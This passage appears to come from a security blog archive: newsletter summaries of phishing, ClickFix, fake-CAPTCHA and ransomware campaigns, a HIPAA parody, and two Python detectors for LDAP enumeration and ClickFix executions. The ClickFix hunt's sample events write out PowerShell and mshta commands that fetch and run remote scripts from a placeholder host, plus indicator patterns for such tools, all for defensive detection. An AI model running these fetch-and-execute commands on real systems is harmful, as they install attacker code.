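# such as SharpHound issue these, but so do admin and IAM tools, hence the allowlist.
BROAD_FILTERS = {
    "(objectclass=*)", "(objectclass=user)", "(objectclass=group)",
    "(objectcategory=person)", "(objectcategory=group)", "(objectcategory=computer)",
}
# Constructed allowlist: hosts expected to enumerate (domain controllers, IAM sync servers).
ALLOWLIST = {"10.0.0.10"}

# Constructed LDAP search log: (client_ip, search_base, scope, filter, requested_attrs).
SAMPLE_SEARCHES = [
    ("10.0.0.5", "DC=corp,DC=example", "subtree", "(sAMAccountName=alice)", ["memberOf"]),
    ("10.0.0.5", "CN=alice,CN=Users,DC=corp,DC=example", "base", "(objectClass=*)", ["mail"]),
    ("10.0.0.10", "DC=corp,DC=example", "subtree", "(objectCategory=person)", ["*"]),
    ("10.0.0.10", "DC=corp,DC=example", "subtree", "(objectCategory=group)", ["*"]),
    ("10.0.0.77", "DC=corp,DC=example", "subtree", "(objectClass=*)", ["*"]),
    ("10.0.0.77", "DC=corp,DC=example", "subtree", "(objectCategory=person)", ["*"]),
    ("10.0.0.77", "DC=corp,DC=example", "subtree", "(objectCategory=group)", ["*"]),
    ("10.0.0.77", "DC=corp,DC=example", "subtree", "(objectCategory=computer)", ["*"]),
    ("10.0.0.77", "CN=Configuration,DC=corp,DC=example", "subtree", "(objectClass=*)", ["*"]),
]


def is_broad(scope, ldap_filter):
    """A subtree search with a class-wide filter returns a directory inventory,
    not one object. A base-scope (objectClass=*) read of a single DN is routine."""
    return scope == "subtree" and ldap_filter.lower() in BROAD_FILTERS


def profile(searches):
    """Per-client counters: total searches, broad searches, bases touched,
    and broad searches that asked for every attribute."""
    stats = defaultdict(lambda: {"total": 0, "broad": 0, "bases": set(), "all_attrs": 0})
    for client, base, scope, flt, attrs in searches:
        s = stats[client]
        s["total"] += 1
        s["bases"].add(base)
        if is_broad(scope, flt):
            s["broad"] += 1
            if attrs == ["*"]:
                s["all_attrs"] += 1
    return stats


def flag_enumeration(searches, min_broad=3):
    """Clients outside the allowlist issuing several broad subtree searches."""
    findings = {}
    for client, s in profile(searches).items():
        if client in ALLOWLIST or s["broad"] < min_broad:
            continue
        findings[client] = {
            "broad": s["broad"], "total": s["total"],
            "all_attrs": s["all_attrs"], "bases": sorted(s["bases"]),
        }
    return findings


if __name__ == "__main__":
    for client, info in flag_enumeration(SAMPLE_SEARCHES).items():
        print(client, info)
```

Run this over a time window (minutes, not days) so that a help-desk tool's occasional broad query does not accumulate into a finding, and baseline the allowlist from a week of real logs before enforcing it.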


'Araneida' Web Hacking Service Linked to Turkish IT Firm 

Recent investigations have uncovered that 'Araneida,' a cloud-based web hacking service, is utilizing a cracked version of Acunetix—a commercial web application vulnerability scanner—to facilitate cyberattacks. Notably, this service has been traced back to a Turkish information technology firm. 

Key Developments: 

  • Exploitation of Cracked Software: Araneida employs an unauthorized version of Acunetix, enabling users to perform offensive reconnaissance, extract user data, and identify exploitable vulnerabilities on target websites. 

  • Proxy Integration for Anonymity: The service incorporates a robust proxy network, allowing scans to originate from a diverse pool of IP addresses, thereby concealing the true source of the activity. 

  • Cybercriminal Promotion: Advertised on multiple cybercrime forums and boasting a Telegram channel with nearly 500 subscribers, Araneida has been linked to the compromise of over 30,000 websites within six months. One user claimed to have purchased a luxury vehicle using proceeds from payment card data obtained through the service. 

  • Connection to Turkish IT Firm: Investigations reveal that the domain araneida[.]co, operational since February 2023, is associated with an individual employed as a senior software developer at Bilitro Yazilim, an IT firm based in Ankara, Turkey. 

Further Reading: Krebs on Security 


LLMs Employed to Obfuscate Malicious JavaScript 

Recent analyses have revealed that adversaries are leveraging large language models (LLMs) to obfuscate malicious JavaScript code, enhancing its ability to evade detection mechanisms. 

Key Developments: 

  • Automated Code Obfuscation: Attackers utilize LLMs to iteratively transform malicious JavaScript through techniques such as variable renaming, dead code insertion, and whitespace removal, without altering the code's functionality. 

  • Evasion of Detection Tools: These LLM-generated variants can bypass traditional detection tools, including static analysis models, by producing natural-looking code that is harder to identify as malicious. 

  • Scalability of Attacks: The use of LLMs enables the creation of numerous unique malware variants at scale, increasing the difficulty for security systems to detect and mitigate these threats effectively. 

Further Reading: Unit 42 Blog 

 

 

Mobile Phishing Attacks Employ New Tactics to Evade Security Measures 

Recent analyses have identified a novel social engineering tactic targeting mobile banking users. Attackers are leveraging Progressive Web Apps (PWAs) and WebAPKs to distribute phishing websites disguised as legitimate applications, effectively bypassing traditional security warnings and app store vetting processes. 

Key Insights: 

  • Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging. 

  • Bypassing Security Measures: Because a PWA or WebAPK is installed from the browser rather than from an app store, it sidesteps store vetting entirely and does not trigger the operating system's usual warnings about installing apps from unknown sources. Attackers can therefore distribute malicious content without raising the alerts users have been trained to notice. 

  • Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them. 

Further Reading: KnowBe4 Blog 

 

In: News. Tags: Newsletter, Cybersecurity, Threat Intelligence

January 2025 - Security Awareness Newsletter

January 8, 2025

This is a security awareness focused newsletter that I share internally. Feel free to grab and use for your own internal security awareness program. Created with help from ChatGPT.

FBI Shares Strategies to Combat AI-Driven Fraud Schemes 

The Federal Bureau of Investigation (FBI) has issued a public service announcement through its Internet Crime Complaint Center (IC3) highlighting the increasing use of generative artificial intelligence (AI) by cybercriminals to make fraud schemes more sophisticated and believable. These AI-powered tactics are being used across a range of fraudulent activities, including romance scams, investment fraud, and job recruitment cons.  

Key Insights: 

  • Enhanced Deception: Generative AI enables criminals to produce highly convincing text, images, audio, and video content, making fraudulent communications appear legitimate and more persuasive. 

  • Voice Cloning: Advanced AI techniques allow for the cloning of voices, which can be used in schemes such as impersonating family members in distress to solicit money or sensitive information.  

  • Synthetic Identities: AI-generated images and profiles are utilized to create fake identities on social media platforms, facilitating social engineering attacks and spear-phishing campaigns. 

Recommendations: 

  • Verify Communications: Be cautious of unsolicited messages, especially those requesting personal information or financial transactions. Confirm the authenticity of such communications through direct and reliable channels. 

  • Establish Verification Protocols: Develop secret codes or phrases with family members and trusted contacts to authenticate identities during unexpected or urgent requests. 

  • Limit Personal Information Sharing: Be mindful of the personal data shared on social media and other public platforms, as it can be exploited to craft personalized and convincing scams. 

Staying informed about the evolving tactics of AI-driven fraud is crucial in safeguarding personal and financial information. 

Further Reading: BleepingComputer Article 

 

 

Black Basta Ransomware Adopts Advanced Social Engineering Tactics 

The Black Basta ransomware group has recently enhanced its attack strategies by incorporating sophisticated social engineering techniques, including email bombing, QR code phishing, and the deployment of custom malware payloads. 

Key Developments: 

  • Email Bombing: Attackers inundate targets with excessive emails by subscribing their addresses to numerous mailing lists. This tactic overwhelms victims and increases the likelihood of interaction with subsequent malicious communications. 

  • Impersonation via Microsoft Teams: Threat actors pose as IT support personnel, contacting victims through Microsoft Teams to establish trust and facilitate the installation of remote access tools. 

  • QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware. 

Further Reading: The Hacker News 

 

 

Phishing Attacks Target Employee Payroll Accounts 

Cybercriminals are increasingly launching phishing attacks aimed at hijacking employee payroll accounts. These schemes often involve fraudulent emails that appear to originate from Human Resources or payroll departments, requesting employees to update or verify their direct deposit information. Unsuspecting employees who comply may inadvertently provide attackers with access to their payroll accounts, leading to unauthorized changes and financial theft. 

Key Insights: 

  • Impersonation of Internal Departments: Attackers craft emails that convincingly mimic internal communications from HR or payroll, exploiting employees' trust in these departments. 

  • Urgency and Deception: Messages often convey a sense of urgency, such as impending payroll issues, to prompt quick action without thorough scrutiny. 

  • Credential Harvesting: Links within these emails direct employees to counterfeit login pages designed to capture their credentials, granting attackers unauthorized access. 

Further Reading: KnowBe4 Blog 

 

 

Surge in 'ClickFix' Social Engineering Attacks 

Cybersecurity researchers have identified a significant increase in the use of a social engineering tactic known as "ClickFix." This method deceives users into copying and pasting malicious commands into their systems, leading to malware infections. 

Key Developments: 

  • Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues. 

  • Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT. 

  • Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates. 

Further Reading: Proofpoint Blog 

 

 

AI-Driven Investment Scams Proliferate via Social Media 

Cybercriminals are increasingly leveraging artificial intelligence (AI) and social media platforms to perpetrate sophisticated investment scams, leading to significant financial and data losses among victims worldwide. 

Key Insights: 

  • AI-Generated Deception: Scammers utilize AI to create convincing video testimonials featuring fabricated endorsements from celebrities and financial experts, enhancing the credibility of fraudulent investment schemes. 

  • Social Media Malvertising: Fraudulent advertisements are disseminated through social media channels, often mimicking legitimate company posts or news outlets, to lure potential investors into the scam. 

  • Phishing Tactics: Victims are directed to counterfeit websites designed to harvest personal information under the guise of investment opportunities, leading to identity theft and unauthorized financial transactions. 

Recommendations: 

  • Verify Authenticity: Scrutinize investment opportunities, especially those encountered through social media, by researching the offering entity and seeking independent financial advice. 

  • Be Skeptical of High Returns: Exercise caution with schemes promising unusually high or guaranteed returns, as these are common indicators of fraudulent activity. 

  • Protect Personal Information: Avoid sharing sensitive data through unsolicited links or forms; ensure websites are legitimate and secure before providing any personal details. 

Staying informed and exercising due diligence are crucial in safeguarding against these evolving AI-driven investment scams. 

Further Reading: The Hacker News 

 

 

Security Alert: Fake Brand Collaboration Scams Targeting YouTube Creators 

Cybercriminals are increasingly targeting YouTube content creators by impersonating reputable brands and offering fraudulent collaboration opportunities. These sophisticated phishing campaigns aim to distribute malware, leading to the theft of sensitive information and unauthorized access to creators' systems. 

Key Insights: 

  • Impersonation of Trusted Brands: Attackers craft convincing emails that appear to originate from well-known companies, proposing enticing partnership deals to lure creators into their scheme. 

  • Malware Delivery via Documents: The fraudulent offers include attachments, such as contracts or promotional materials, often delivered through password-protected files hosted on platforms like OneDrive to evade detection. 

  • Theft of Sensitive Information: Once the malware is installed, it can steal login credentials, financial data, and grant attackers remote access to the victim's system, compromising both personal and channel security. 

Further Reading: CloudSEK Blog 

 

 

Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees 

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware. 

Key Developments: 

  • Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information. 

  • Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update. 

  • SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions. 

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware. 

Further Reading: Malwarebytes Blog 

 

 

Threat Actors Exploit LinkedIn to Target Job Seekers 

Cybercriminals are increasingly leveraging LinkedIn to deceive job seekers through sophisticated employment scams. By creating fake recruiter profiles, often enhanced with AI-generated images, these threat actors craft personalized messages that appear to offer legitimate job opportunities. The objective is to lure victims into clicking on malicious links that lead to phishing sites designed to harvest personal information or deploy malware. 

Key Insights: 

  • Personalized Deception: Scammers tailor messages based on the victim's professional background, making the fraudulent offers appear credible and enticing. 

  • Advanced Phishing Techniques: The use of AI-generated recruiter profiles and convincing communication strategies increases the likelihood of victims engaging with malicious content. 

  • Exploitation of LinkedIn Features: By abusing LinkedIn's InMail feature, attackers can reach users outside their immediate network, broadening the scope of potential targets. 

Further Reading: KnowBe4 Blog 

 

 

Cybercriminals Impersonate KnowBe4 in Phishing Attacks 

Cybercriminals are impersonating KnowBe4 by sending fraudulent emails that closely mimic legitimate "Please Complete Assigned Training" notifications. These deceptive emails aim to trick recipients into clicking malicious links or downloading harmful attachments, potentially compromising personal and organizational security. 

Key Insights: 

  • Sophisticated Mimicry: The phishing emails are designed to closely resemble authentic KnowBe4 training notifications, making it challenging for recipients to distinguish between legitimate and fraudulent communications. 

  • Malicious Intent: Interacting with the links or attachments in these emails can lead to malware infections, unauthorized access to sensitive information, or other security breaches. 

  • Targeted Deception: By exploiting the trust associated with KnowBe4's brand, attackers increase the likelihood of recipients falling victim to the scam. 

Further Reading: KnowBe4 Blog 

 

 

Malicious Advertisements Pose Growing Threat to Internet Users 

Cybercriminals are increasingly utilizing malicious advertisements, or "malvertising," to distribute malware and conduct phishing attacks. These deceptive ads often appear as legitimate sponsored content on search engine results pages, making it challenging for users to distinguish between safe and harmful links. 

Key Insights: 

  • Prevalence of Malvertising: Malicious actors pay search engines to display their harmful URLs as sponsored ads, which are prominently positioned above legitimate search results. This tactic increases the likelihood of user engagement with malicious content. 

  • Deceptive Appearances: These ads are crafted to closely mimic legitimate websites or services, often using familiar branding and language to deceive users into clicking on them. 

  • Potential Consequences: Interacting with malvertising can lead to malware infections, unauthorized access to personal information, and financial loss. 

Further Reading: KnowBe4 Blog 

 

 

Mobile Phishing Campaign Targets Job Seekers 

Cybercriminals are impersonating recruiters to target job seekers with phony employment offers. Researchers at Zimperium warn that a phishing campaign is targeting Android phones to deliver the Antidot banking trojan.  

Key Insights: 

  • Sophisticated Social Engineering: Attackers masquerade as job recruiters or HR representatives from well-known organizations, sending well-crafted phishing emails that purport to come from real companies, informing recipients that they’ve been selected to advance in the hiring process. 

  • Malware Delivery: Victims are enticed to download a malicious application, leading to the installation of the Antidot banking trojan on their Android devices. 

  • Credential Theft: Once installed, the malware enables a broad set of malicious actions, including credential theft of banking, cryptocurrency, and other critical applications. 

Further Reading: KnowBe4 Blog 

 

 

Phishing Scam Mimics Employment Termination Notices 

Cybercriminals are deploying phishing attacks that impersonate employment termination notices to exploit individuals' fear of job loss. These deceptive emails appear to be official communications from human resources departments, complete with authentic-looking logos and case numbers, urging immediate action to avoid "serious legal consequences." 

Key Insights: 

  • Deceptive Emails: The phishing emails are designed to closely resemble legitimate employment termination notices, making it challenging for recipients to distinguish between authentic and fraudulent communications. 

  • Malware Distribution: Clicking on the provided link directs victims to a fake Microsoft webpage that prompts the download of malicious software. This malware can steal sensitive information, including banking credentials, leading to significant financial and personal repercussions. 

  • Exploiting Emotional Triggers: By preying on the fear of job loss, attackers increase the likelihood of recipients reacting hastily and clicking on malicious links without proper scrutiny. 

Further Reading: KnowBe4 Blog 

 

 

Malicious Google Ads Exploit Printer Troubleshooting Searches 

Cybercriminals are exploiting Google Ads to target users seeking solutions for printer issues, particularly those involving HP and Canon devices. 

Key Insights: 

  • Deceptive Advertisements: Scammers purchase Google Ads that appear as legitimate tech support for printer drivers, luring users into clicking on malicious links. 

  • Fake Installation Processes: Upon visiting these fraudulent sites, users encounter a simulated driver installation that culminates in a fabricated error message, warning that further attempts may damage the printer and void its warranty. 

  • Phony Tech Support: The error message prompts users to initiate a live chat, connecting them with scammers posing as tech support representatives, who may then attempt to extract personal information or payments. 

Further Reading: KnowBe4 Blog 

 

 

Phishing Attack Exploits Google Calendar to Bypass Spam Filters 

Cybercriminals are leveraging Google Calendar invites to conduct phishing attacks that evade spam filters. By sending fraudulent meeting invitations, they prompt recipients to click on malicious links embedded within the event details. 

Key Insights: 

  • Exploitation of Trusted Services: Attackers utilize legitimate Google services, such as Calendar and Forms, to enhance the credibility of their phishing attempts, making detection more challenging. 

  • Evasion of Security Measures: By originating from trusted platforms, these phishing messages can bypass traditional email security filters, increasing the likelihood of reaching potential victims. 

  • Deceptive Tactics: The fraudulent invitations often include links disguised as legitimate actions, such as viewing event details or confirming attendance, which redirect to malicious sites designed to harvest user credentials. 

Further Reading: BleepingComputer 

 

 

Smart Devices in Homes Pose Privacy and Security Risks 

Recent analyses have highlighted the potential privacy and security vulnerabilities associated with the increasing presence of smart devices in households. These devices, while offering convenience, can be exploited by malicious actors to compromise personal information and security.  


Key Insights: 

  • Unauthorized Access: Smart devices, such as cameras and voice assistants, can be manipulated to monitor activities within homes without the owner's consent. 

  • Data Exploitation: Information collected by these devices may be accessed or intercepted by unauthorized parties, leading to potential misuse of personal data. 

  • Regulatory Challenges: The rapid adoption of smart technology has outpaced the development of comprehensive regulations, leaving consumers vulnerable to emerging threats. 

Further Reading: Check Point Blog 

 

 

Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware 

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems. 

Key Developments: 

  • Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and Cloudflare. 

  • Clipboard Hijacking: The fake CAPTCHA uses JavaScript to silently copy a malicious command to the user's clipboard, then instructs the user, as a supposed verification step, to open the Windows Run prompt (Win+R), paste (Ctrl+V), and press Enter. The user runs the command without ever seeing what it does. 

  • Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems. 

Further Reading: ReliaQuest Blog 
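Both this item and the "Surge in 'ClickFix' Social Engineering Attacks" item above come down to the same thing on the endpoint: a person pastes a command into the Run box or a terminal, and a script host spawns from that interactive parent with a command line that fetches and executes remote content. As an added example (not code from ReliaQuest or Proofpoint), the Python below hunts for that pattern in process-creation telemetry. It assumes records normalised to dicts resembling Sysmon event ID 1 or EDR process-start events (parent_image, image, command_line); that the Run dialog's children are parented by explorer.exe and typed shells by WindowsTerminal/conhost is an assumption about Windows behaviour stated here for the rule. The indicator list and the sample events are constructed for illustration; example.invalid is a reserved name that does not resolve.

```python
"""Hunt for ClickFix / fake-CAPTCHA executions in process-creation telemetry.

Added example, not from the Proofpoint or ReliaQuest write-ups. Assumes
records already normalised to dicts with parent_image, image and
command_line (Sysmon event ID 1 / EDR process-start shape). Indicator
patterns, parent lists and sample events are illustrative assumptions.
"""
import base64
import binascii
import re

# Parents that suggest a human pasted the command (assumption: explorer.exe
# parents the Win+R Run dialog's children; terminals parent typed shells).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe", "openconsole.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Download-and-execute indicators, matched against the lower-cased command line
# plus any decoded -EncodedCommand payload.
INDICATORS = [
    ("invoke-restmethod", re.compile(r"\birm\b|invoke-restmethod")),
    ("invoke-webrequest", re.compile(r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient")),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression")),
    ("hidden-window",     re.compile(r"-w(?:indowstyle)?\s+hidden")),
    ("encoded-command",   re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}")),
    ("mshta-remote",      re.compile(r"mshta(?:\.exe)?\s+(?:https?:|javascript:|vbscript:)")),
    ("lolbin-download",   re.compile(r"certutil\b.*-urlcache|bitsadmin\b.*/transfer|"
                                     r"curl\b.*\|\s*(?:cmd|powershell|pwsh)")),
]
# powershell.exe accepts -e / -ec / -enc / -encodedcommand (assumed prefix set).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def analyse(event):
    """Classify one process-start record.

    Returns None when nothing is suspicious, otherwise a dict whose verdict is
    'clickfix' (interactive parent + download/execute indicators) or
    'download_exec' (indicators without the interactive parent).
    """
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(event["command_line"])
    haystack = (event["command_line"] + "\n" + decoded).lower()
    hits = [name for name, rx in INDICATORS if rx.search(haystack)]
    if not hits:
        return None
    verdict = "clickfix" if parent in INTERACTIVE_PARENTS else "download_exec"
    return {"verdict": verdict, "parent": parent, "image": image,
            "indicators": hits, "decoded": decoded}


def _enc(ps):
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/captcha.hta"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -nop -w hidden -enc " + _enc(
         'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/x.ps1")')},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell -NoProfile -File C:\Scripts\cleanup.ps1"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": 'powershell -c "Get-Process"'},
    {"parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": 'pwsh -c "iex (irm https://example.invalid/dev.ps1)"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyse(ev)
        print(r["verdict"] if r else "clean", "|", ev["command_line"][:60],
              "|", r["indicators"] if r else [])
```

Two design points worth noting. Decoding the -EncodedCommand payload before matching matters because the ClickFix one-liners are frequently base64-wrapped, and a rule that only inspects the raw command line sees nothing but a "-enc" flag. Splitting the verdict by parent process keeps the rule honest: the same download-and-execute string launched from a developer's editor is still worth a look, but it is not evidence that a person was tricked into pasting it.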

 

 

Data Breach at American Addiction Centers Affects Over 422,000 Individuals 

American Addiction Centers (AAC), a leading provider of substance abuse treatment services, has reported a data breach impacting more than 422,000 individuals. 

Key Details: 

  • Incident Timeline: The breach was detected on September 26, 2024, with unauthorized access occurring several days prior. 

  • Compromised Information: Exfiltrated data includes names, addresses, phone numbers, dates of birth, Social Security numbers, health insurance details, and medical record identifiers. Notably, treatment information and payment card data were not affected. 

  • Threat Actor Involvement: The Rhysida ransomware group has claimed responsibility, alleging the theft of approximately 2.8 terabytes of data. 

  • Notification and Support: AAC has begun notifying affected individuals and is offering 12 months of free credit monitoring services. 

Further Reading: SecurityWeek 

 

 

Sophisticated Phishing Scams Lead to Significant Cryptocurrency Losses 

Recent incidents have highlighted advanced phishing attacks where cybercriminals impersonate legitimate services to gain unauthorized access to individuals' cryptocurrency wallets, resulting in substantial financial losses. 

Key Insights: 

  • Impersonation of Trusted Entities: Attackers pose as representatives from reputable organizations, such as Google or cryptocurrency platforms, to deceive victims into believing their accounts are compromised. 

  • Manipulation of Security Features: Victims receive seemingly legitimate security alerts and prompts, which are actually orchestrated by the attackers to facilitate unauthorized account access. 

  • Exploitation of Stored Sensitive Information: Once access is obtained, cybercriminals search for stored sensitive data, such as cryptocurrency wallet seed phrases, enabling them to transfer funds without detection. 

Further Reading: Krebs on Security 

 

 

Mobile Phishing Attacks Employ New Tactics to Evade Security Measures 

Recent analyses have identified a novel social engineering tactic targeting mobile banking users. Attackers are leveraging Progressive Web Apps (PWAs) and WebAPKs to distribute phishing websites disguised as legitimate applications, effectively bypassing traditional security warnings and app store vetting processes. 

Key Insights: 

  • Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging. 

  • Bypassing Security Measures: Because a PWA or WebAPK is installed from the browser rather than from an app store, it sidesteps store vetting entirely and does not trigger the operating system's usual warnings about installing apps from unknown sources. Attackers can therefore distribute malicious content without raising the alerts users have been trained to notice. 

  • Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them. 

Further Reading: KnowBe4 Blog 

 

 

'James Bond-Style' Scams Lead to Significant Financial Losses 

Recent reports have highlighted a surge in sophisticated scams where fraudsters impersonate trusted entities, such as law enforcement or intelligence agencies, to deceive victims into believing they are involved in international criminal activities. 

Key Insights: 

  • Deceptive Communication: Scammers contact individuals, claiming to be from reputable organizations like Amazon, the U.S. Postal Service, or law enforcement agencies, alleging the victim's involvement in global criminal schemes. 

  • Manipulative Tactics: Victims are coerced into withdrawing large sums of money from personal accounts under the guise of protecting their funds from criminal misuse. They are instructed to hand over cash to individuals posing as law enforcement agents, who then abscond with the money. 

  • Significant Financial Impact: These scams have led to substantial financial losses for victims, with little to no chance of recovery once the funds are handed over. 

Further Reading: KnowBe4 Blog 

In: News. Tags: Newsletter, scams, phishing, social engineering, security awareness

DHHS Angry Translator: Breaking Down the Latest HIPAA Security Rule Proposal

January 7, 2025

Let’s face it: regulatory updates like those from the Department of Health and Human Services (DHHS) often come wrapped in a blanket of formal language that makes you wonder, What are they really saying? Enter the DHHS Angry Translator, here to break it down and tell it like it is. Like the recently introduced CISA Angry Translator, the DHHS Angry Translator, Hank, has a no-nonsense take on the proposed changes to the HIPAA Security Rule—because sometimes, you need a little fire to get the message across.

Created with help from ChatGPT

DHHS Says:
"Covered entities and business associates must adopt reasonable and appropriate administrative, physical, and technical safeguards to protect the confidentiality, integrity, and availability of ePHI."

Hank:
"Look, people! You’re handling sensitive health information here—stop treating it like a casual to-do list. Lock it down! If you wouldn’t leave patient records lying around in a coffee shop, don’t let your servers be a free-for-all!"

DHHS Says:
"We propose clarifying the definition of 'security incident' to ensure timely identification and response to unauthorized access, use, or disclosure of ePHI."

Hank:
"Translation: Stop pretending you didn’t notice the breach. When someone jiggles the doorknob, that’s your cue to ACT, not wait for the whole door to come down!"

DHHS Says:
"Entities must perform regular risk assessments to identify vulnerabilities and implement measures to mitigate those risks effectively."

Hank:
"Let me break it down for you: Take a good, hard look at your systems. If you see a crack, fix it! Don’t wait for a cybercriminal to make it a canyon!"

DHHS Says:
"The proposed changes aim to enhance accountability and transparency in managing ePHI security."

Hank:
"Translation: If you mess up, we’re coming for you. There’s no hiding anymore. Either you get your house in order, or we’ll do it for you—with penalties."

DHHS Says:
"We propose revisions to the administrative safeguards, emphasizing the necessity of documented policies and procedures for incident response and risk management."

Hank:
"Y’all need to WRITE THIS DOWN! A half-baked plan in someone’s head doesn’t cut it. If a breach happens and your response is ‘Uh... what now?’—you’re already toast!"

DHHS Says:
"The proposal includes requirements to integrate continuous monitoring into risk management practices for ePHI security."

Hank:
"‘Continuous monitoring’ means don’t just check your security once a year like it’s a New Year’s resolution. Stay on top of it! Hackers aren’t taking vacations—they’re coming for you every day!"

DHHS Says:
"Entities must evaluate their use of encryption to ensure ePHI remains secure during transmission and storage."

Hank:
"If your data isn’t encrypted, it’s like sending patient records via postcard: everyone can see it! Encrypt. Everything. Period."

DHHS Says:
"We are revising technical safeguard requirements to account for emerging technologies and new cybersecurity threats."

Hank:
"Translation: If you’re still using security from the early 2000s, it’s time for an upgrade. Hackers have moved on, and so should you!"

DHHS Says:
"Workforce training should address phishing attacks, unauthorized device use, and secure access to ePHI."

Hank:
"Teach your people that clicking shady links isn’t just a bad idea—it’s a disaster waiting to happen. Also, tell them to stop using their cousin’s unsecured iPad for work!"

DHHS Says:
"The proposed changes highlight accountability mechanisms for business associates handling ePHI."

Hank:
"Listen up, third parties: If you’re touching ePHI, you’re on the hook too. No more pointing fingers when things go wrong. Handle the data like it’s your grandma’s—or get burned!"

DHHS Says:
"Periodic evaluations of safeguards will ensure compliance with evolving security standards."

Hank:
"‘Periodic evaluations’ means you don’t just set it and forget it. Check your defenses regularly, or you’ll be picking up the pieces after the next attack!"

Final Note from the Angry Translator:
"This proposal isn’t just about checking boxes—it’s about protecting people. If your security plan is older than your favorite streaming service, fix it. Now. Because when things go wrong, it’s not just your reputation on the line—it’s patients’ trust and safety too."

The public comment period for the proposed HIPAA Security Rule changes is open until March 7, 2025. If you're at a healthcare organization, make sure to read the proposal and submit your public comments. I am currently doing a deep dive on the proposal and will have thoughts in a future blog post.

In: News, Advice. Tags: HIPAA, Healthcare, Cybersecurity

Top 10 Exploring Information Security Podcasts

December 31, 2024

As we wrap up an incredible year, we're thrilled to reflect on the top podcasts of 2024 that captured the attention of listeners across the cybersecurity community. These episodes brought forward thought-provoking discussions, practical insights, and exciting guests, making this a standout year for Exploring Information Security. Below are the top 10 episodes that ChatGPT thought were the best of 2024. As I analyzed the analytics I couldn’t decide which stats to focus in on. Here’s what the podcasts look like based on plays from Apple Podcast Analytics.

Screenshot of the analytics from Apple Podcasts analytics

I thought about going by average consumption, but I noticed that we have a lower percentage than in the past. That's due to the longer episodes I'm putting out. When I'm putting out 20-30 minute episodes I get closer to a 70-80% consumption rate. Do unique listeners and engagement say more? At this point I decided to just let ChatGPT do the analysis of all the analytics and provide me with the Top 10 list. It also wrote the first draft of this blog post. I'm okay with the Top 10 list. I believe it represents the podcast well and some of the interest I've seen in other places regarding individual episodes.

The numbers are just from Apple Podcasts. There are listeners on other platforms such as Spotify, Amazon, and other podcast apps that grab the feed. I also expanded into YouTube in the middle of the year and hope to get that tuned better. I may try to consolidate the stats into one platform at some point, but I'm not there yet. Apple Podcasts is the most popular platform, so I think it provides the best sample size.

Without further ado let’s get into the Top 10 list for 2024.


2024 Top 10 Exploring Information Security Podcast

1. Exploring Information Security 2024 Relaunch

  • Release Date: January 2, 2024

  • Guest: Solo Episode

Key Highlights:
